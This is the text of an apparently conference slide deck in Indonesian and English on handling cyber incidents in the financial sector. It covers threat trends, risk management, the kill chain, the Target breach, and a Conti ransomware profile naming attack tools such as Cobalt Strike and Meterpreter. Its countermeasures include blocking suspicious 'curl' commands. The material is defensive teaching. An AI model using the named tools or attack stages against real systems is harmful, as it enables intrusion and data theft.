Best Practices: Penanganan

Insiden Keamanan Siber di Sektor Jasa Keuangan (SJK)

Manajemen Insiden Keamanan Siber

Dr. Charles Lim, Msc., Bsc., CCSE, CTIA, CHFI, EDRP, ECSA, ECSP, ECIH, CEH, CEI
Serpong, 18th Aug 2022
 About Me
Dr. Charles Lim, Msc., CCSE, CTIA, CHFI, EDRP, ECSA, ECSP, ECIH, CEH, CEI
Head of Cyber Security Laboratory and Security Operation Center
Researcher – Information Security Research Group and Lecturer
Swiss German University
Charles.lims [at] gmail.com and charles.lim [at] sgu.ac.id
http://people.sgu.ac.id/charleslim

Research Interest
• Malware
• Intrusion Detection
• Vulnerability Analysis
• Digital Forensics
• Cloud Security

Community
Indonesia Honeynet Project - Chapter Lead
Academy CSIRT – member
Asosiasi Forensik Digital Indonesia - member
Tentang Swiss German University (SGU)

MOU SGU & BSSN | 24 November 2018 | Tangerang, Indonesia

MALWARE
Research
Collaboration
THREAT INTELLIGENCE

3
SGU Master of IT Program

4
 ISIF Research Grant 2019, 2020, 2021

There are 3 outcomes of this research: SGU

1. A more robust repository platform for processing and storing broader range of
honeynet-based threat information
2. A highly available data lake platform that allows security analyst perform threat
correlation between honeynet threat information with existing OSINT.
3. A higher quality threat information, including description, scoring and analysis
report, which is generated automatically by system in the help of security analyst,
allowing organizations to easily share and exchange security threat information
BSSN IHP
with other organizations.
5
AGENDA
• Ancaman & Serangan Siber
• Keamanan Informasi
• Evolusi Bisnis
• Risiko Bisnis & Manajemen Risiko
• Serangan APT
• Studi Kasus
• Kesiapan Organisasi
• Q &A

6
To competently perform rectifying security service,
two critical incident response elements are
necessary: information and organization.

—Robert E. Davis
Ancaman & Serangan
Siber

8
Cyber Attack Variants
Tren Terkini

Attack Surface

9
Cyber Threats 2022

Source: Gartner
10
Peta Ancaman Siber 2022 (Industri)

https://blog.checkpoint.com/2022/01/10/check-point-research-cyber-attacks-increased-50-year-over-year/
11
12
Breach Discovery (Avg)

~6 Bulan

https://www.ibm.com/security/digital-assets/cost-data-breach-report/#/
13
Frequency of Ransomware Attacks

https://cybersecurityventures.com/ransomware-damage-report-2017-5-billion/
14
FBI Response

15
Keamanan Informasi

16
Information Security
SECURE

17
InfoSec, CompSec & Cyber Security

18
Security Threats, Risks & Strategy

External Threats

Insider Threats

Risks & Line of Defenses (Transfer, Mitigate, Avoid, Accept)

Corporate Critical Assets: Intellectual Property, Revenue, Reputation, etc.

RECOVER ADAPT & RESHAPE

19
Risk Equation

Asset
THREATS X Vulnerability X Value

RISK =
Security
Controls

20
Evolusi Bisnis

21
Evolution of Business

Data/Information is $$$$$

https://businessmodel.company/business-model-evolution/
22
Cyber Risk of Digital Transformation
• Free Internet Service is the
norm

• Users sacrifice personal

privacy data for free service

• User profiles are “sold” to

Vendor so that better service
could be provided to users

https://www.worldbank.org/en/publication/wdr2016
23
Digital Trends
• Digital Transformation
• Cost Effectiveness
• Customer Experience
• Disruptive product and/or
services

• Customer Facing
Experience
• Mobile Devices
• Service Process Design
• Emerging Technologies

24
Manajemen Risiko

25
Known/Unknown Risk - Business Risk
KNOWN
RISKS
Calculated
Business Risks

UNKNOWN
RISKS
Un-calculated
Business Risks

26
Risk Management Known Risks

Pro-active

Managing
Risk
Reactive

Unknown Risks
https://www.wipro.com/capital-markets/cybersecurity-essentials-for-capital-markets-firms-in-the-digital-age/

27
Manajemen Insiden
Keamanan Siber

28
Cyber Security Framework

29
Cyber Security Framework

30
Incident Response: DRP & BCP

http://www.metin-mitchell.com/how-to-mitigate-the-risks-of-cyber-security-through-contingency-planning/

31
Business Continuity Plan (BCP)
Emergency A successful
response plan
outcome

Crisis management/
communication plan
A

Business
recovery plan
Activity

Malcolm Cornish FBCI - MARSH

32
APT Attacks

33
Karakteristik Advanced Persistent Threat
Advanced
• Berbagai macam teknik yang digunakan termasuk pengembangan malware khusus
• Gabungan dari masing-masing teknik dikhususkan untuk target

Persistent
• Aplikasi akan berada dalam sistem dalam jangka waktu panjang untuk mencapai
tujuan
• Serangan dilakukan bertahap sampai sistem berhasil diambil alih

Threats
• Ancaman dilakukan oleh penyerang yang mempunyai kemampuan dan didanai untuk
mengambil alih sistem target
• Gabungan berbagai tools untuk menyerang secara otomatis menjadi tujuan utama

34
Serangan APT
• Maksud:
• Mencuri kekayaan intelektual sampai dengan disrupsi sistem
• Teknik yang digunakan: Target: Karyawan
• Social engineering
• Email lewat Spear-phishing
• Drive-by-downloads – melalui website yang sudah dikompromi/disusupi
• Tujuan:
• Menginfeksi target dengan malware yang mempunyai berbagai kemampuan
(disesuaikan dengan target)
• Mengakses ke salah satu sistem ➔ bisa terus akses sistem dan mengakses
sistem berikutnya (lewat lateral movement)

35
Tahapan Serangan Siber – Cyber Kill Chain

Recon Weaponize Deliver Exploit Install C&C Action

Riset tentang Persiapan Pengiriman Exploitasi Intalasi Komunikasi Tindakan u/

Target: senjata: senjata: Sistem: Backdoor: dengan C&C: pencapaian:

Profil dan Malware untuk Melalui USB, Kerentanan Untuk Untuk Pengambilan
Kelemahan eksploitasi Email, URL Link Sistem menjadi persistensi mendapat atau
Sistem sistem dan lainnya target dalam sistem instruksi lebih pengrusakan
lanjut data

36
Intrusion Kill Chain

https://www.oreilly.com/library/view/practical-cyber-intelligence/9781788625562/37a5852b-ef31-4b1e-a184-93ea7cf5cd75.xhtml

37
Studi Kasus I

38
Case Study – TARGET Data Breach (1/2)

Use HVAC credentials

to get into Target
Network, then Malware collected all
reconnaissance the credit cards onto 3 Federal investigator
performed to install staging serves before warned Target on 12
malware sent to Moscow Dec on data breach

Sent the credit card Credit card numbers 15 Dec Target

stealing malware on flowing out starting 2 Dec confirmed the breach
Cashier machine and security system afer 40 million credit
detected the breach but card numbers stolen
failed to act.

39
Case Study – TARGET Data Breach (1/2)
Attacker took advantage of Attacker took advantage of weak
Target vendor weakness control of Target network ➔
to penetrate into Target’s Attacker move into other part of
network the network

Recon Weaponize Deliver Exploit Install C&C Action

Target missed warnings Target missed info from

from anti-intrusion anti-intrusion software
software ➔ malware ➔ millions credit card #
installed stolen

40
Studi Kasus II:
Ransomware

41
Ransomware

Ransomware – a type of malware that threatens to publish

the victim's data or perpetually block access to it unless a
ransom is paid.

42
Ransomware Family - Evolution

43
Ransomware – How it works

44
Profiling Conti Ransomware
FIRST SEEN
• Malware Name: Conti Ransomware 2020
• Infection Method: Email phishing (PDF via Google
Doc Link)
• Malware Type: Trojan
• Goal: Create backdoor
• Threat Actor: Wizard Spider (Russian Cybercrime)
• Target: Windows Domain
• Tools: Meterpreter, Cobaltstrike, PS Empire, Adfind
• Capability: Persistence, Lateral Movement, Backup
Removal (Veeam Software)
• Impact :
• Stealing credentials
• Private/Confidential Information exposed

45
Conti Ransomware - Countermeasure
• Early Stage ➔ Employee Training (Email Security)
• Tracking externally exposed endpoints is therefore critical.
• To prevent lateral movement
• Network segregation
• Windows Domain Segmentation
• Audit and/or block command-line interpreters
• AppLocker or Software Restriction Policies ➔ suspicious “curl” command and
unauthorized “.msi” installer scripts
• Data-exfiltration ➔ proper logging of process execution with command-
line arguments.
• Data backup
• Special security protocols ➔ preventing Veeam account takeover.
• 3-2-1 Rule: 2 Copies with different media and 1 backup at different location
• 24x7 Security Operation Center ➔ Monitor Key Signals

46
Kesiapan Organisasi (1/2)
• Always Backup your data

• Don’t click links or attachment of suspicious email

• Browse and download from trusted sites.

• Always use original software and update regularly

• Use secure channel

• Continuous Monitoring
47
Kesiapan Organisasi (2/2)
• Pilar Pokok Keamanan Siber: People, Process dan Technology

• Manajemen Insiden berfokus pada Tata Kelola berbasis Risiko

dan meningkatkan kolaborasi antara academics, business,
government, and community (ABGC)

• Perlindungan Data Pribadi menjadi penting ketika data menjadi nilai

terpenting dalam semua aspek transaksi elektronik

• Bisnis, Operasi, dan Teknologi akan terus berevolusi, Organisasi

selalu WAJIB siap untuk berubah (Change) ➔ agile

48
Are you ready ?

If You Fail to Plan, You Are Planning to Fail”

Benjamin Franklin

49
Tanya & Jawab

50